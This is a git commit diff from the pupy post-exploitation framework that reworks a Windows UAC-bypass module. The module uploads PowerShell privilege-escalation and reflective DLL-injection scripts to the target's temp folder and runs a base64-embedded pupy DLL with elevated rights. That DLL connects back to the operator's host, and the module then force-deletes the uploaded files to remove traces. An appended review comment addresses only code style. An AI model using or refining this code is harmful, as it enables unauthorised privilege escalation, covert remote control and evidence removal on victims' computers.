mirror of https://github.com/n1nj4sec/pupy.git
Remove temp files remotely and use pupy powershell module
This commit is contained in:
parent
069d892ec0
commit
3d89e1319a
|
@ -5,9 +5,10 @@ import platform
|
||||||
import pupygen
|
import pupygen
|
||||||
from rpyc.utils.classic import upload
|
from rpyc.utils.classic import upload
|
||||||
import base64
|
import base64
|
||||||
from tempfile import gettempdir
|
from tempfile import gettempdir, _get_candidate_names
|
||||||
import subprocess
|
import subprocess
|
||||||
|
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||||
|
import re
|
||||||
|
|
||||||
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
'''
|
'''
|
||||||
|
@ -15,37 +16,36 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
'''
|
'''
|
||||||
module.client.load_package("psutil")
|
module.client.load_package("psutil")
|
||||||
module.client.load_package("pupwinutils.processes")
|
module.client.load_package("pupwinutils.processes")
|
||||||
|
#Define Remote paths
|
||||||
remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
remoteTempFolder=module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||||
changeMeTag = "$$$CHANGE_ME$$$"
|
invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
|
||||||
#First powershell script executed by Invoke-BypassUAC
|
invokeBypassUACRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
|
||||||
mainPowerShellScript = """
|
mainPowershellScriptRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.ps1')
|
||||||
cat $$$CHANGE_ME$$$\Invoke-BypassUAC.txt | Out-String | iex
|
pupyDLLRemotePath = "{0}.{1}".format(module.client.conn.modules['os.path'].join(remoteTempFolder, next(_get_candidate_names())), '.txt')
|
||||||
Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file $$$CHANGE_ME$$$\secdPowerShellScriptPrivileged.ps1' -Verbose
|
#Define Local paths
|
||||||
"""
|
mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
|
||||||
#Second powershell script executed by first main script (privileged)
|
invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||||
secdPowerShellScriptPrivileged = """
|
invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
|
||||||
cat $$$CHANGE_ME$$$\Invoke-ReflectivePEInjection.txt | Out-String | iex
|
invokeBypassUACLocalPath = os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||||
cat $$$CHANGE_ME$$$\dllFile.txt | Out-String | iex
|
pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
|
||||||
|
#Constants
|
||||||
|
bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1
|
||||||
|
byPassUACSuccessString = "DLL injection complete!"
|
||||||
|
#main powershell script executed by bypassuac powershell script
|
||||||
|
mainPowerShellScriptPrivileged = """
|
||||||
|
cat {0} | Out-String | iex
|
||||||
|
cat {1} | Out-String | iex
|
||||||
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
|
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
|
||||||
"""
|
""" #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
|
||||||
mainPowerShellScriptPath = os.path.join(gettempdir(),'mainPowerShellScript.txt')
|
logging.info("Creating the Powershell script in %s locally"%(mainPowerShellScriptPrivilegedLocalPath))
|
||||||
logging.info("Creating the main Powershell script in %s locally"%(mainPowerShellScriptPath))
|
with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
|
||||||
f = open(mainPowerShellScriptPath,'w+')
|
w.write(mainPowerShellScriptPrivileged.format(invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
|
||||||
f.write(mainPowerShellScript.replace(changeMeTag, remoteTempFolder))
|
logging.info("Uploading powershell code for DLL injection in {0}".format(invokeReflectivePEInjectionRemotePath))
|
||||||
f.close()
|
upload(module.client.conn, invokeReflectivePEInjectionLocalPath, invokeReflectivePEInjectionRemotePath)
|
||||||
secdPowerShellScriptPrivilegedPath = os.path.join(gettempdir(),'secdPowerShellScriptPrivileged.txt')
|
#logging.info("Uploading powershell code for UAC Bypass in {0}".format())
|
||||||
logging.info("Creating the second Powershell script in %s locally"%(secdPowerShellScriptPrivilegedPath))
|
#upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath)
|
||||||
f = open(secdPowerShellScriptPrivilegedPath,'w+')
|
logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(mainPowerShellScriptPrivilegedLocalPath))
|
||||||
f.write(secdPowerShellScriptPrivileged.replace(changeMeTag, remoteTempFolder))
|
upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath, mainPowershellScriptRemotePath)
|
||||||
f.close()
|
|
||||||
logging.info("Uploading powershell code for DLL injection...")
|
|
||||||
upload(module.client.conn, os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), module.client.conn.modules['os.path'].join(remoteTempFolder,'Invoke-ReflectivePEInjection.txt'))
|
|
||||||
logging.info("Uploading powershell code for UAC Bypass...")
|
|
||||||
upload(module.client.conn, os.path.join(rootPupyPath,"pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1"), module.client.conn.modules['os.path'].join(remoteTempFolder,'Invoke-BypassUAC.txt'))
|
|
||||||
logging.info("Uploading main powershell script...")
|
|
||||||
upload(module.client.conn, mainPowerShellScriptPath, module.client.conn.modules['os.path'].join(remoteTempFolder,'mainPowerShellScript.ps1'))
|
|
||||||
logging.info("Uploading second powershell script...")
|
|
||||||
upload(module.client.conn, secdPowerShellScriptPrivilegedPath, module.client.conn.modules['os.path'].join(remoteTempFolder,'secdPowerShellScriptPrivileged.ps1'))
|
|
||||||
res=module.client.conn.modules['pupy'].get_connect_back_host()
|
res=module.client.conn.modules['pupy'].get_connect_back_host()
|
||||||
host, port = res.rsplit(':',1)
|
host, port = res.rsplit(':',1)
|
||||||
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||||
|
@ -59,20 +59,23 @@ def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
|
||||||
else:
|
else:
|
||||||
module.error("Target architecture is unknown (!= x86 or x64), abording...")
|
module.error("Target architecture is unknown (!= x86 or x64), abording...")
|
||||||
return
|
return
|
||||||
pupyDLLPath = os.path.join(gettempdir(),'dllFile.txt')
|
logging.info("Creating the pupy dll in %s locally"%(pupyDLLLocalPath))
|
||||||
remotePupyDLLPath = module.client.conn.modules['os.path'].join(remoteTempFolder,'dllFile.txt')
|
with open(pupyDLLLocalPath, 'w+') as w:
|
||||||
logging.info("Creating the pupy dll in %s locally"%(pupyDLLPath))
|
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||||
f = open(pupyDLLPath,'w+')
|
logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
|
||||||
f.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
|
||||||
f.close()
|
content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)
|
||||||
logging.info("Uploading pupy dll...")
|
logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
|
||||||
upload(module.client.conn, pupyDLLPath, remotePupyDLLPath)
|
output = execute_powershell_script(module, content, bypassUACcmd)
|
||||||
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s"%(module.client.conn.modules['os.path'].join(remoteTempFolder,'mainPowerShellScript.ps1')), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
logging.info("BypassUAC script output: %s\n"%(output))
|
||||||
logging.info("BypassUAC script output: %s"%(output))
|
if byPassUACSuccessString in output:
|
||||||
if "DLL injection complete!" in output:
|
|
||||||
module.success("UAC bypassed")
|
module.success("UAC bypassed")
|
||||||
else:
|
else:
|
||||||
module.warning("Impossible to know what's happened remotely")
|
module.warning("Impossible to know what's happened remotely. You should active debug mode.")
|
||||||
|
for aFile in [invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath, mainPowershellScriptRemotePath, pupyDLLRemotePath]:
|
||||||
|
logging.info("Deleting remote file {0}".format(aFile))
|
||||||
|
output = module.client.conn.modules.subprocess.check_output("DEL /F /Q \"{0}\"".format(aFile), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||||
|
logging.debug("Delete Status: {0}".format(repr(output)))
|
||||||
module.success("Waiting for a connection from the DLL (take few seconds)...")
|
module.success("Waiting for a connection from the DLL (take few seconds)...")
|
||||||
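Review bot: The new line `content = re.sub("Write-Verbose ","Write-Output ", open(invokeBypassUACLocalPath, 'r').read(), flags=re.I)` opens the local script without closing it, while the rest of this commit deliberately moved the other file accesses to `with` blocks; for consistency and to avoid relying on refcount-based cleanup, write it as `with open(invokeBypassUACLocalPath, 'r') as r:` followed by `content = re.sub("Write-Verbose ", "Write-Output ", r.read(), flags=re.I)`. Relatedly, `invokeBypassUACRemotePath` is still generated in the first hunk and removed in the cleanup loop, but its upload is now commented out, so the path is dead state that will confuse the next reader; either drop it from the list or add a comment such as `# Invoke-BypassUAC is no longer uploaded; it is passed inline to execute_powershell_script`. The names come from `tempfile._get_candidate_names`, an underscore-prefixed private helper whose availability is not guaranteed across Python releases, which deserves a short note at the import or a public alternative. The enclosing function begins outside this hunk.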
|
|
||||||
|
|
||||||
|
|